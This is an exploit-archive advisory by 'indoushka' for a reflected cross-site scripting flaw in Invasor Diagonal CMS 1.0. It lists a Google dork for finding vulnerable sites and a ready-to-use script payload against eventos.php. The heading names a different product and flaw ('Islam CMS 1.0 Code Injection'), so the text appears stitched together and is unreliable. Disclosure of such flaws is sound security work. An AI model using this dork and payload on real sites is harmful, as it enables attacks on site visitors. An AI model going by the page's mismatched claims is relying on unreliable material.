Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Islam CMS 1.0 Code Injection

Invasor Diagonal CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Invasor Diagonal CMS 1.0 XSS Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://invasordiagonal.com                                                                                        |  | # Dork      : intext:''web development // invasor diagonal''                                                                     |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+]  http://target_site/eventos.php?id=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#windows